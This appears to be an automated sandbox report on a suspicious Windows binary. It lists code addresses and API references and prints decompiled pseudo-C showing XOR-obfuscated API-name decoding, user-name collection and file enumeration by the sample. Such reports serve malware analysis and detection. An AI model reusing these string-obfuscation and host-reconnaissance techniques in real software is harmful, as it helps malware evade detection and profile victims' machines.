                                                                0x0102130c
                                                                0x01021313
                                                                0x01021316
                                                                0x01021320
                                                                0x01021329
                                                                0x01021329
                                                                0x01021334
                                                                0x010212c4
                                                                0x010212f7
                                                                0x010212f7
                                                                0x00000000
                                                                0x010212fc
                                                                0x01021336
                                                                0x00000000
                                                                0x01021322
                                                                0x01021322
                                                                0x01021337
                                                                0x01021337
                                                                0x0102133c
                                                                0x0102133d
                                                                0x01021449
                                                                0x00000000
                                                                0x01021449
                                                                0x01021343
                                                                0x0102134d
                                                                0x0102135a
                                                                0x0102136a
                                                                0x01021385
                                                                0x0102139f
                                                                0x010213a2
                                                                0x010213a4
                                                                0x010213a7
                                                                0x010213b1
                                                                0x010213b6
                                                                0x010213c6
                                                                0x010213cb
                                                                0x010213d0
                                                                0x010213d3
                                                                0x010213e3
                                                                0x010213ea
                                                                0x010213ef
                                                                0x010213f7
                                                                0x010213fa
                                                                0x01021406
                                                                0x01021406
                                                                0x01021407
                                                                0x01021409
                                                                0x0102140c
                                                                0x0102140c
                                                                0x010213d9
                                                                0x010213db
                                                                0x010213dd
                                                                0x010213dd
                                                                0x010213dd
                                                                0x01021324
                                                                0x01021326
                                                                0x01021326
                                                                0x00000000
                                                                0x01021324
                                                                0x01021320
                                                                0x010211fb
                                                                0x01021202
                                                                0x01021207
                                                                0x01021210
                                                                0x01021215
                                                                0x0102121f
                                                                0x01021224
                                                                0x0102122e
                                                                0x01021233
                                                                0x01021238
                                                                0x0102123b
                                                                0x01021241
                                                                0x01021248
                                                                0x010212e8
                                                                0x010212ec
                                                                0x010212ee
                                                                0x01021304
                                                                0x01021307
                                                                0x00000000
                                                                0x01021307
                                                                0x010212f0
                                                                0x010212f0
                                                                0x010212f0
                                                                0x010212f4
                                                                0x00000000
                                                                0x010212f4
                                                                0x01021256
                                                                0x0102125b
                                                                0x01021270
                                                                0x010212aa
                                                                0x010212aa
                                                                0x010212aa
                                                                0x010212aa
                                                                0x010212ae
                                                                0x010212b1
                                                                0x010212ba
                                                                0x010212cb
                                                                0x010212ce
                                                                0x010212d0
                                                                0x010212d0
                                                                0x010212d0
                                                                0x010212d7
                                                                0x010212d7
                                                                0x010212e0
                                                                0x010212e2
                                                                0x010212e4
                                                                0x010212e4
                                                                0x00000000
                                                                0x010212e2
                                                                0x010212bc
                                                                0x010212c0
                                                                0x010212c3
                                                                0x00000000
                                                                0x010212c3
                                                                0x0102127a
                                                                0x0102127f
                                                                0x0102128a
                                                                0x0102128f
                                                                0x01021297
                                                                0x0102129b
                                                                0x0102129f
                                                                0x00000000
                                                                0x00000000
                                                                0x010212a1
                                                                0x00000000

                                                                APIs
                                                                • LoadLibraryA.KERNEL32(Kernel32.dll,WaitForSingleObject,000000FF,000000FF), ref: 01021416
                                                                • GetProcAddress.KERNEL32(00000000), ref: 0102141D
                                                                  • Part of subcall function 01093211: GetTickCount.KERNEL32 ref: 0109324C
                                                                  • Part of subcall function 01093211: GetUserNameA.ADVAPI32(?,?), ref: 010932AC
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000011.00000002.744792392.0000000001021000.00000020.00020000.sdmp, Offset: 01020000, based on PE: true
                                                                • Associated: 00000011.00000002.744778722.0000000001020000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000011.00000002.745118664.00000000010AF000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000011.00000002.745159076.00000000010C1000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000011.00000002.745175580.00000000010C2000.00000008.00020000.sdmp Download File
                                                                • Associated: 00000011.00000002.745203086.00000000010CB000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000011.00000002.745218914.00000000010D5000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000011.00000002.745237651.00000000010D8000.00000002.00020000.sdmp Download File
                                                                Similarity
                                                                • API ID: AddressCountLibraryLoadNameProcTickUser
                                                                • String ID: Kernel32.dll$WaitForSingleObject$exe$status
                                                                • API String ID: 3324814288-1373669212
                                                                • Opcode ID: e3b66abd1c5c22a358b881aab8d8bdd800a14da27d870360ebb96846acbf9e12
                                                                • Instruction ID: b5103372605a1cb645bd0b58adb43129c8601c9018f0bd280411c90825ea6851
                                                                • Opcode Fuzzy Hash: e3b66abd1c5c22a358b881aab8d8bdd800a14da27d870360ebb96846acbf9e12
                                                                • Instruction Fuzzy Hash: F7610671D0025AABDF04FBF9CD55AFD7BB4AF22200F4041A9E1D1FA191DE348A09CB91
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 010A5551, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 77libraryloaderCOMMONCrypto
                                                                Download Yara Rule
                                                                C-Code - Quality: 100%
                                                                			E010A5551(CHAR* __ecx) {
				char _v5;
				intOrPtr _v9;
				intOrPtr _v13;
				char _v17;
				char _v18;
				signed char _v19;
				signed char _v20;
				signed char _v21;
				signed char _v22;
				signed char _v23;
				signed char _v24;
				signed char _v25;
				signed char _v26;
				signed char _v27;
				signed char _v28;
				signed char _v29;
				signed char _v30;
				signed char _v31;
				signed char _v32;
				signed char _v33;
				signed char _v34;
				signed char _v35;
				signed char _v36;
				signed char _t28;
				signed char _t30;
				signed char _t32;
				signed char _t34;
				signed char _t36;
				signed char _t38;
				signed char _t40;
				signed char _t42;
				signed char _t44;
				signed char _t46;
				signed char _t48;
				signed char _t50;
				signed char _t52;
				signed char _t54;
				signed char _t56;
				signed char _t58;
				signed char _t60;
				signed char _t62;
				CHAR* _t64;
				signed int _t68;

				_t28 = "GetFileAttributesA"; // 0x47
				_v18 = 0;
				_v36 = _t28 ^ 0x00000040;
				_t30 = M010C2B89; // 0x65
				_v17 = 0x2d30242b;
				_v35 = _t30 ^ 0x00000041;
				_t32 = M010C2B8A; // 0x74
				_v13 = 0x75752921;
				_v34 = _t32 ^ 0x00000042;
				_t34 = M010C2B8B; // 0x46
				_v9 = 0x27262d66;
				_v33 = _t34 ^ 0x00000043;
				_t36 = M010C2B8C; // 0x69
				_v5 = 0;
				_v32 = _t36 ^ 0x00000044;
				_t38 = M010C2B8D; // 0x6c
				_v31 = _t38 ^ 0x00000045;
				_t40 = M010C2B8E; // 0x65
				_v30 = _t40 ^ 0x00000046;
				_t42 = M010C2B8F; // 0x41
				_v29 = _t42 ^ 0x00000047;
				_t44 = M010C2B90; // 0x74
				_v28 = _t44 ^ 0x00000048;
				_t46 = M010C2B91; // 0x74
				_v27 = _t46 ^ 0x00000049;
				_t48 = M010C2B92; // 0x72
				_v26 = _t48 ^ 0x0000004a;
				_t50 = M010C2B93; // 0x69
				_v25 = _t50 ^ 0x0000004b;
				_t52 = M010C2B94; // 0x62
				_v24 = _t52 ^ 0x0000004c;
				_t54 =  *0x10c2b95; // 0x75
				_v23 = _t54 ^ 0x0000004d;
				_t56 =  *0x10c2b96; // 0x74
				_v22 = _t56 ^ 0x0000004e;
				_t58 =  *0x10c2b97; // 0x65
				_v21 = _t58 ^ 0x0000004f;
				_t60 =  *0x10c2b98; // 0x73
				_v20 = _t60 ^ 0x00000050;
				_t62 =  *0x10c2b99; // 0x41
				_v19 = _t62 ^ 0x00000051;
				_t64 = E010451BC( &_v36);
				_t25 =  &_v17; // 0x2d30242b
				GetProcAddress(LoadLibraryA(E010451D7(_t25)), _t64); // executed
				_t68 = GetFileAttributesA(__ecx); // executed
				return _t68 & 0xffffff00 | _t68 != 0xffffffff;
			}














































                                                                0x010a5557
                                                                0x010a555e
                                                                0x010a5562
                                                                0x010a5565
                                                                0x010a556c
                                                                0x010a5573
                                                                0x010a5576
                                                                0x010a557d
                                                                0x010a5584
                                                                0x010a5587
                                                                0x010a558e
                                                                0x010a5595
                                                                0x010a5598
                                                                0x010a559f
                                                                0x010a55a3
                                                                0x010a55a6
                                                                0x010a55ad
                                                                0x010a55b0
                                                                0x010a55b7
                                                                0x010a55ba
                                                                0x010a55c1
                                                                0x010a55c4
                                                                0x010a55cb
                                                                0x010a55ce
                                                                0x010a55d5
                                                                0x010a55d8
                                                                0x010a55df
                                                                0x010a55e2
                                                                0x010a55e9
                                                                0x010a55ec
                                                                0x010a55f3
                                                                0x010a55f6
                                                                0x010a55fd
                                                                0x010a5600
                                                                0x010a5607
                                                                0x010a560a
                                                                0x010a5611
                                                                0x010a5614
                                                                0x010a561b
                                                                0x010a561e
                                                                0x010a5629
                                                                0x010a562c
                                                                0x010a5632
                                                                0x010a5642
                                                                0x010a5648
                                                                0x010a5651

                                                                APIs
                                                                • LoadLibraryA.KERNEL32(00000000,00000000,?,?,?,00000000), ref: 010A563B
                                                                • GetProcAddress.KERNEL32(00000000), ref: 010A5642
                                                                • GetFileAttributesA.KERNELBASE(?,?,00000000), ref: 010A5648
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000011.00000002.744792392.0000000001021000.00000020.00020000.sdmp, Offset: 01020000, based on PE: true
                                                                • Associated: 00000011.00000002.744778722.0000000001020000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000011.00000002.745118664.00000000010AF000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000011.00000002.745159076.00000000010C1000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000011.00000002.745175580.00000000010C2000.00000008.00020000.sdmp Download File
                                                                • Associated: 00000011.00000002.745203086.00000000010CB000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000011.00000002.745218914.00000000010D5000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000011.00000002.745237651.00000000010D8000.00000002.00020000.sdmp Download File
                                                                Similarity
                                                                • API ID: AddressAttributesFileLibraryLoadProc
                                                                • String ID: +$0-!)uuf-&'$GetFileAttributesA
                                                                • API String ID: 1945639845-1226665172
                                                                • Opcode ID: dcd0dd60609a7ea9db699873097b70569966af4eef4a61afd6d6e9d88da494da
                                                                • Instruction ID: e72dd69d6a1398601d06d91e777ecdbd0ca178c95d187b5e214cf970dd436ace
                                                                • Opcode Fuzzy Hash: dcd0dd60609a7ea9db699873097b70569966af4eef4a61afd6d6e9d88da494da
                                                                • Instruction Fuzzy Hash: 0D31C8A58093CAADCF229FF4A4545EFBFB41D2B350B496185C1E43F647C119034AEBA2
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 01093211, Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 414COMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 94%
                                                                			E01093211(intOrPtr* __ecx) {
				char _v268;
				char _v300;
				void* _v308;
				char _v316;
				char _v332;
				char _v348;
				char _v356;
				intOrPtr* _v376;
				char _v380;
				char _v384;
				char _v388;
				char _v392;
				char _v396;
				intOrPtr _v400;
				char _v404;
				char _v420;
				intOrPtr _v424;
				char _v428;
				char _v444;
				char _v452;
				intOrPtr _v456;
				char _v460;
				char _v468;
				char _v476;
				intOrPtr _v480;
				char _v484;
				char _v492;
				char _v500;
				intOrPtr _v504;
				char _v508;
				char _v516;
				char _v524;
				intOrPtr _v528;
				char _v532;
				char _v540;
				char _v548;
				intOrPtr _v552;
				char _v556;
				char _v564;
				char _v572;
				char _v580;
				char _v596;
				char _v604;
				intOrPtr _v608;
				char _v612;
				char _v620;
				char _v624;
				char _v628;
				char _v636;
				char _v644;
				char _v652;
				char _v655;
				signed int _v656;
				signed int _v660;
				char _v663;
				intOrPtr _v664;
				char _v668;
				char _v672;
				char _v674;
				long _v676;
				char _v680;
				char _v684;
				char _v696;
				char _v708;
				char _v716;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t155;
				signed int _t157;
				intOrPtr _t162;
				void* _t165;
				intOrPtr _t172;
				void* _t176;
				intOrPtr* _t186;
				intOrPtr _t187;
				intOrPtr* _t189;
				intOrPtr _t190;
				intOrPtr* _t192;
				intOrPtr _t193;
				intOrPtr* _t195;
				intOrPtr _t196;
				intOrPtr* _t198;
				intOrPtr _t199;
				intOrPtr* _t201;
				intOrPtr _t202;
				void* _t229;
				intOrPtr* _t264;
				intOrPtr* _t268;
				char* _t271;
				intOrPtr* _t272;
				void* _t275;
				void* _t276;
				intOrPtr* _t281;
				intOrPtr* _t298;
				intOrPtr* _t302;
				intOrPtr* _t306;
				intOrPtr* _t310;
				intOrPtr* _t314;
				intOrPtr* _t318;
				void* _t373;
				void* _t377;
				intOrPtr* _t386;
				intOrPtr* _t388;
				intOrPtr* _t391;
				signed int _t395;
				intOrPtr _t396;
				intOrPtr* _t398;
				void* _t399;
				void* _t400;
				void* _t401;
				void* _t402;
				void* _t403;
				void* _t404;
				signed int _t406;
				void* _t408;

				_t408 = (_t406 & 0xfffffff8) - 0x2a4;
				_t391 = __ecx;
				_t268 = 0x10c23dc;
				 *((intOrPtr*)(__ecx + 0x10)) = 0;
				 *((intOrPtr*)(__ecx + 0x14)) = 0xf;
				_t3 = _t268 + 1; // 0x10c23dd
				_t373 = _t3;
				 *((char*)(__ecx)) = 0;
				do {
					_t155 =  *_t268;
					_t268 = _t268 + 1;
				} while (_t155 != 0);
				E01094686(__ecx, 0x10c23dc, _t268 - _t373);
				_t157 = GetTickCount();
				_t271 =  &_v663;
				do {
					_t271 = _t271 - 1;
					_t395 = 0xa;
					_t6 = _t157 % _t395;
					_t157 = _t157 / 0x10c23dc;
					 *_t271 = _t6 + 0x30;
				} while (_t157 != 0);
				_v380 = 0;
				_v396 = 0;
				_t396 = 0xf;
				_v376 = 0x10c23dc;
				if(_t271 !=  &_v655) {
					E01094686( &_v396, _t271,  &_v655 - _t271);
				}
				_v676 = 0x101;
				GetUserNameA( &_v268,  &_v676); // executed
				_t272 =  &_v268;
				_v404 = 0;
				_v400 = _t396;
				_t377 = _t272 + 1;
				_v420 = 0;
				do {
					_t162 =  *_t272;
					_t272 = _t272 + 1;
				} while (_t162 != 0);
				E01094686( &_v420,  &_v268, _t272 - _t377);
				_t165 = E01028388( &_v420, _t377, 0);
				_pop(_t275);
				E010282F1(_t275, _t165);
				_pop(_t276);
				E0109317E( &_v332, E010282D0(_t276, _t272 - _t377));
				E010A47F9( &_v356);
				E010A5652(_t408 - 0x18);
				E010A5969( &_v636, _t272 - _t377); // executed
				_v608 = _t396;
				_v612 = 0;
				_t281 = 0x10c23dc;
				_v628 = 0;
				_t30 = _t281 + 1; // 0x10c23dd
				_t379 = _t30;
				do {
					_t172 =  *_t281;
					_t281 = _t281 + 1;
				} while (_t172 != 0);
				E01094686( &_v620, 0x10c23dc, _t281 - _t379);
				_t264 = _v636;
				_t398 =  *_t264;
				while(1) {
					_t420 = _t398 - _t264;
					if(_t398 == _t264) {
						break;
					}
					_v660 = _v660 & 0x00000000;
					_t35 = _t398 + 8; // 0x10c23e4
					_v656 = _v656 & 0x00000000;
					E01094728( &_v676, _t35);
					_t379 =  &_v624;
					_t176 = E010947FC( &_v656,  &_v624, "=");
					__eflags = _v660 - 0x10;
					_t288 =  >=  ? _v680 :  &_v680;
					E010944ED( &_v384, E010946CF(_t176,  >=  ? _v680 :  &_v680, _v664));
					E010944B8( &_v636,  &_v388);
					E01094615( &_v392);
					E01094615( &_v672);
					E01094615( &_v696);
					_t398 =  *_t398;
				}
				E010AE836( &_v300, _t379, _t420); // executed
				E010A8186( &_v596);
				_v676 = 0x2d27312f;
				_t54 =  &_v676; // 0x2d27312f
				_v672 = 0x222b2c30;
				_v668 = 0;
				_t186 = E01045084(_t54);
				_t380 = _t186;
				_v428 = 0;
				_t298 = _t186;
				_v424 = 0xf;
				_v444 = 0;
				_t60 = _t298 + 1; // 0x1
				_t399 = _t60;
				do {
					_t187 =  *_t298;
					_t298 = _t298 + 1;
				} while (_t187 != 0);
				E01094686( &_v444, _t380, _t298 - _t399);
				_t62 =  &_v684; // 0x2d27312f
				_v684 = 0x1028232f;
				_v680 = 0x290f363d;
				_v676 = 0x262e;
				_v674 = 0;
				_t189 = E01045141(_t62);
				_t381 = _t189;
				_v460 = 0;
				_t302 = _t189;
				_v456 = 0xf;
				_v476 = 0;
				_t70 = _t302 + 1; // 0x1
				_t400 = _t70;
				do {
					_t190 =  *_t302;
					_t302 = _t302 + 1;
				} while (_t190 != 0);
				E01094686( &_v468, _t381, _t302 - _t400);
				_v684 = 0x272c2032;
				_v680 = 0;
				_t192 = E010450F0( &_v684);
				_t382 = _t192;
				_v484 = 0;
				_t306 = _t192;
				_v480 = 0xf;
				_v500 = 0;
				_t78 = _t306 + 1; // 0x1
				_t401 = _t78;
				do {
					_t193 =  *_t306;
					_t306 = _t306 + 1;
				} while (_t193 != 0);
				E01094686( &_v492, _t382, _t306 - _t401);
				_t80 =  &_v684; // 0x272c2032
				_v684 = 0x33273925;
				_v680 = 0x2e3125;
				_t195 = E010450D5(_t80);
				_t383 = _t195;
				_v508 = 0;
				_t310 = _t195;
				_v504 = 0xf;
				_v524 = 0;
				_t86 = _t310 + 1; // 0x1
				_t402 = _t86;
				do {
					_t196 =  *_t310;
					_t310 = _t310 + 1;
				} while (_t196 != 0);
				E01094686( &_v516, _t383, _t310 - _t402);
				_t88 =  &_v684; // 0x33273925
				_v684 = 0x262e2826;
				_v680 = 0x37;
				_t198 = E01045069(_t88);
				_t384 = _t198;
				_v532 = 0;
				_t314 = _t198;
				_v528 = 0xf;
				_v548 = 0;
				_t94 = _t314 + 1; // 0x1
				_t403 = _t94;
				do {
					_t199 =  *_t314;
					_t314 = _t314 + 1;
				} while (_t199 != 0);
				E01094686( &_v540, _t384, _t314 - _t403);
				_t96 =  &_v684; // 0x262e2826
				_v684 = 0x31273235;
				_v680 = 0x222b242a;
				_v676 = 0;
				_t201 = E01045084(_t96);
				_t385 = _t201;
				_v556 = 0;
				_t318 = _t201;
				_v552 = 0xf;
				_v572 = 0;
				_t103 = _t318 + 1; // 0x1
				_t404 = _t103;
				do {
					_t202 =  *_t318;
					_t318 = _t318 + 1;
					_t432 = _t202;
				} while (_t202 != 0);
				E01094686( &_v564, _t385, _t318 - _t404);
				_push( &_v404);
				E0109478A(E0109478A( &_v604, _t385,  &_v452), _t385,  &_v564);
				_push( &_v316);
				E010A9083(E0109478A( &_v612, _t385,  &_v484), _t385, _t432, _t206);
				_push( &_v348);
				E0109478A(E0109478A( &_v620, _t385,  &_v516), _t385, _t210);
				_push( &_v380);
				E0109478A(E0109478A( &_v628, _t385,  &_v548), _t385, _t214);
				_push( &_v660);
				E0109478A(E0109478A( &_v636, _t385,  &_v580), _t385, _t218);
				_push( &_v468);
				E0109478A(E0109478A( &_v644, _t385,  &_v612), _t385, _t222);
				_t229 = E010A8DB6( &_v652,  &_v708); // executed
				E010944B8(_t391, _t229);
				E01094615( &_v716);
				_t433 =  *((intOrPtr*)(_t391 + 0x14)) - 0x10;
				_t386 = _t391;
				if( *((intOrPtr*)(_t391 + 0x14)) >= 0x10) {
					_t386 =  *_t391;
				}
				E010944B8(_t391, E01094FAD( &_v652, _t386,  *((intOrPtr*)(_t391 + 0x10))));
				E01094615( &_v656);
				E010944B8(_t391, E01097A10( &_v656, _t391, _t433));
				E01094615( &_v660);
				_t388 = _t391;
				if( *((intOrPtr*)(_t391 + 0x14)) >= 0x10) {
					_t388 =  *_t391;
				}
				E010944B8(_t391, E01094FAD( &_v652, _t388,  *((intOrPtr*)(_t391 + 0x10))));
				E01094615( &_v656);
				_t136 =  &_v680; // 0x222b242a
				_v680 = 0x22362024;
				_v676 = 0x79;
				E010944B8(_t391, E01094866( &_v656, E01045069(_t136), _t391));
				E01094615( &_v660);
				E01094615( &_v572);
				E01094615( &_v548);
				E01094615( &_v524);
				E01094615( &_v500);
				E01094615( &_v476);
				E01094615( &_v452);
				E010A81AA(0, _t391);
				E010A81AA(0, _t391);
				E01094615( &_v628);
				E01094395( &_v636, _t404);
				E01094615( &_v356);
				E01094615( &_v332);
				E01094615( &_v428);
				E01094615( &_v404);
				return _t391;
			}























































































































                                                                0x01093217
                                                                0x01093220
                                                                0x01093227
                                                                0x0109322b
                                                                0x0109322e
                                                                0x01093235
                                                                0x01093235
                                                                0x01093238
                                                                0x0109323a
                                                                0x0109323a
                                                                0x0109323c
                                                                0x0109323d
                                                                0x01093247
                                                                0x0109324c
                                                                0x01093252
                                                                0x01093256
                                                                0x01093258
                                                                0x0109325b
                                                                0x0109325c
                                                                0x0109325c
                                                                0x01093261
                                                                0x01093263
                                                                0x0109326d
                                                                0x01093274
                                                                0x0109327b
                                                                0x0109327c
                                                                0x01093285
                                                                0x01093292
                                                                0x01093292
                                                                0x0109329b
                                                                0x010932ac
                                                                0x010932b2
                                                                0x010932b9
                                                                0x010932c0
                                                                0x010932c7
                                                                0x010932ca
                                                                0x010932d1
                                                                0x010932d1
                                                                0x010932d3
                                                                0x010932d4
                                                                0x010932ea
                                                                0x010932f0
                                                                0x010932f5
                                                                0x010932f7
                                                                0x010932fc
                                                                0x0109330b
                                                                0x01093317
                                                                0x01093321
                                                                0x0109332a
                                                                0x0109332f
                                                                0x0109333b
                                                                0x0109333f
                                                                0x01093341
                                                                0x01093345
                                                                0x01093345
                                                                0x01093348
                                                                0x01093348
                                                                0x0109334a
                                                                0x0109334b
                                                                0x01093357
                                                                0x0109335c
                                                                0x01093360
                                                                0x010933e9
                                                                0x010933e9
                                                                0x010933eb
                                                                0x00000000
                                                                0x00000000
                                                                0x01093367
                                                                0x0109336c
                                                                0x0109336f
                                                                0x01093379
                                                                0x01093383
                                                                0x0109338b
                                                                0x01093390
                                                                0x0109339e
                                                                0x010933b3
                                                                0x010933c4
                                                                0x010933d0
                                                                0x010933d9
                                                                0x010933e2
                                                                0x010933e7
                                                                0x010933e7
                                                                0x010933f8
                                                                0x01093401
                                                                0x01093408
                                                                0x01093410
                                                                0x01093414
                                                                0x0109341c
                                                                0x01093420
                                                                0x01093425
                                                                0x01093427
                                                                0x0109342e
                                                                0x01093430
                                                                0x0109343b
                                                                0x01093442
                                                                0x01093442
                                                                0x01093445
                                                                0x01093445
                                                                0x01093447
                                                                0x01093448
                                                                0x01093457
                                                                0x0109345c
                                                                0x01093460
                                                                0x01093468
                                                                0x01093470
                                                                0x01093477
                                                                0x0109347b
                                                                0x01093480
                                                                0x01093482
                                                                0x01093489
                                                                0x0109348b
                                                                0x01093496
                                                                0x0109349d
                                                                0x0109349d
                                                                0x010934a0
                                                                0x010934a0
                                                                0x010934a2
                                                                0x010934a3
                                                                0x010934b2
                                                                0x010934bb
                                                                0x010934c3
                                                                0x010934c7
                                                                0x010934cc
                                                                0x010934ce
                                                                0x010934d5
                                                                0x010934d7
                                                                0x010934e2
                                                                0x010934e9
                                                                0x010934e9
                                                                0x010934ec
                                                                0x010934ec
                                                                0x010934ee
                                                                0x010934ef
                                                                0x010934fe
                                                                0x01093503
                                                                0x01093507
                                                                0x0109350f
                                                                0x01093517
                                                                0x0109351c
                                                                0x0109351e
                                                                0x01093525
                                                                0x01093527
                                                                0x01093532
                                                                0x01093539
                                                                0x01093539
                                                                0x0109353c
                                                                0x0109353c
                                                                0x0109353e
                                                                0x0109353f
                                                                0x0109354e
                                                                0x01093553
                                                                0x01093557
                                                                0x0109355f
                                                                0x01093566
                                                                0x0109356b
                                                                0x0109356d
                                                                0x01093574
                                                                0x01093576
                                                                0x01093581
                                                                0x01093588
                                                                0x01093588
                                                                0x0109358b
                                                                0x0109358b
                                                                0x0109358d
                                                                0x0109358e
                                                                0x0109359d
                                                                0x010935a2
                                                                0x010935a6
                                                                0x010935ae
                                                                0x010935b6
                                                                0x010935ba
                                                                0x010935bf
                                                                0x010935c1
                                                                0x010935c8
                                                                0x010935ca
                                                                0x010935d5
                                                                0x010935dc
                                                                0x010935dc
                                                                0x010935df
                                                                0x010935df
                                                                0x010935e1
                                                                0x010935e2
                                                                0x010935e2
                                                                0x010935f1
                                                                0x010935fd
                                                                0x01093613
                                                                0x0109361f
                                                                0x01093635
                                                                0x01093641
                                                                0x01093657
                                                                0x01093663
                                                                0x01093679
                                                                0x01093682
                                                                0x01093698
                                                                0x010936a4
                                                                0x010936ba
                                                                0x010936c8
                                                                0x010936d0
                                                                0x010936d9
                                                                0x010936de
                                                                0x010936e2
                                                                0x010936e4
                                                                0x010936e6
                                                                0x010936e6
                                                                0x010936f8
                                                                0x01093701
                                                                0x01093714
                                                                0x0109371d
                                                                0x01093726
                                                                0x01093728
                                                                0x0109372a
                                                                0x0109372a
                                                                0x0109373c
                                                                0x01093745
                                                                0x0109374b
                                                                0x0109374f
                                                                0x01093757
                                                                0x01093772
                                                                0x0109377b
                                                                0x01093787
                                                                0x01093793
                                                                0x0109379f
                                                                0x010937ab
                                                                0x010937b7
                                                                0x010937c3
                                                                0x010937cc
                                                                0x010937d8
                                                                0x010937e1
                                                                0x010937ea
                                                                0x010937f6
                                                                0x01093802
                                                                0x0109380e
                                                                0x0109381a
                                                                0x01093827

                                                                APIs
                                                                • GetTickCount.KERNEL32 ref: 0109324C
                                                                • GetUserNameA.ADVAPI32(?,?), ref: 010932AC
                                                                  • Part of subcall function 01094615: _Deallocate.LIBCONCRT ref: 01094624
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000011.00000002.744792392.0000000001021000.00000020.00020000.sdmp, Offset: 01020000, based on PE: true
                                                                • Associated: 00000011.00000002.744778722.0000000001020000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000011.00000002.745118664.00000000010AF000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000011.00000002.745159076.00000000010C1000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000011.00000002.745175580.00000000010C2000.00000008.00020000.sdmp Download File
                                                                • Associated: 00000011.00000002.745203086.00000000010CB000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000011.00000002.745218914.00000000010D5000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000011.00000002.745237651.00000000010D8000.00000002.00020000.sdmp Download File
                                                                Similarity
                                                                • API ID: CountDeallocateNameTickUser
                                                                • String ID: *$+"52'1$/1'-
                                                                • API String ID: 1504973654-1671824692
                                                                • Opcode ID: 540dacbd8a233d6aac180bba45fa983e6c55d7eceb8c27259b0ab49619979ca8
                                                                • Instruction ID: 5665b9226c7a58c5a7fb22388673f6da27ca528b45f1e3132994ba3ee22a68d7
                                                                • Opcode Fuzzy Hash: 540dacbd8a233d6aac180bba45fa983e6c55d7eceb8c27259b0ab49619979ca8
                                                                • Instruction Fuzzy Hash: EEF164711083829BCB29EF24C9A4AEFB7E5BFA9304F444A1DE0C987251DF31554ADB53
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 010A5969, Relevance: 4.6, APIs: 3, Instructions: 102fileCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 01096A8F: __EH_prolog.LIBCMT ref: 01096A94
                                                                • FindFirstFileW.KERNELBASE(?,?,?,?,010CB844,00000000,00000000,?,0000000F,00000000), ref: 010A59CF
                                                                • FindNextFileW.KERNELBASE(00000000,00000010), ref: 010A5A78
                                                                  • Part of subcall function 010A60BC: _memcmp.LIBVCRUNTIME ref: 010A60E2
                                                                • FindClose.KERNELBASE(00000000), ref: 010A5A87
                                                                Memory Dump Source
                                                                • Source File: 00000011.00000002.744792392.0000000001021000.00000020.00020000.sdmp, Offset: 01020000, based on PE: true
                                                                • Associated: 00000011.00000002.744778722.0000000001020000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000011.00000002.745118664.00000000010AF000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000011.00000002.745159076.00000000010C1000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000011.00000002.745175580.00000000010C2000.00000008.00020000.sdmp Download File
                                                                • Associated: 00000011.00000002.745203086.00000000010CB000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000011.00000002.745218914.00000000010D5000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000011.00000002.745237651.00000000010D8000.00000002.00020000.sdmp Download File
                                                                Similarity
                                                                • API ID: Find$File$CloseFirstH_prologNext_memcmp
                                                                • String ID:
                                                                • API String ID: 1302757292-0
                                                                • Opcode ID: 8fe06f7b200b58aeda844a8e9ef8c88a1dde00a3822bf2e3253914ba191ff7fd
                                                                • Instruction ID: 0bd86e44652cdd0c9729c57a02d919b6050ade2da723ca252b3d3bd3565649fb
                                                                • Opcode Fuzzy Hash: 8fe06f7b200b58aeda844a8e9ef8c88a1dde00a3822bf2e3253914ba191ff7fd
                                                                • Instruction Fuzzy Hash: DF41EB70A1021E9FDF14DF94C9A5DEEB7B4FF24604F84056DE586A3190EB306A4ACB50
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 01046F37, Relevance: 1.5, APIs: 1, Instructions: 30COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetSystemInfo.KERNELBASE(010D5318,00000000,01090CE8,0000000F,00000010,?,?), ref: 01046F5E
                                                                Memory Dump Source
                                                                • Source File: 00000011.00000002.744792392.0000000001021000.00000020.00020000.sdmp, Offset: 01020000, based on PE: true
                                                                • Associated: 00000011.00000002.744778722.0000000001020000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000011.00000002.745118664.00000000010AF000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000011.00000002.745159076.00000000010C1000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000011.00000002.745175580.00000000010C2000.00000008.00020000.sdmp Download File
                                                                • Associated: 00000011.00000002.745203086.00000000010CB000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000011.00000002.745218914.00000000010D5000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000011.00000002.745237651.00000000010D8000.00000002.00020000.sdmp Download File
                                                                Similarity
                                                                • API ID: InfoSystem
                                                                • String ID:
                                                                • API String ID: 31276548-0
                                                                • Opcode ID: ffbc0d0f34ad12ef5533244f4ef673cc6514503397d71db2691f43a405d05d28
                                                                • Instruction ID: ee507254c407538baff15901d4592b904fdaa17f6563d52da4c5082b0e526c30
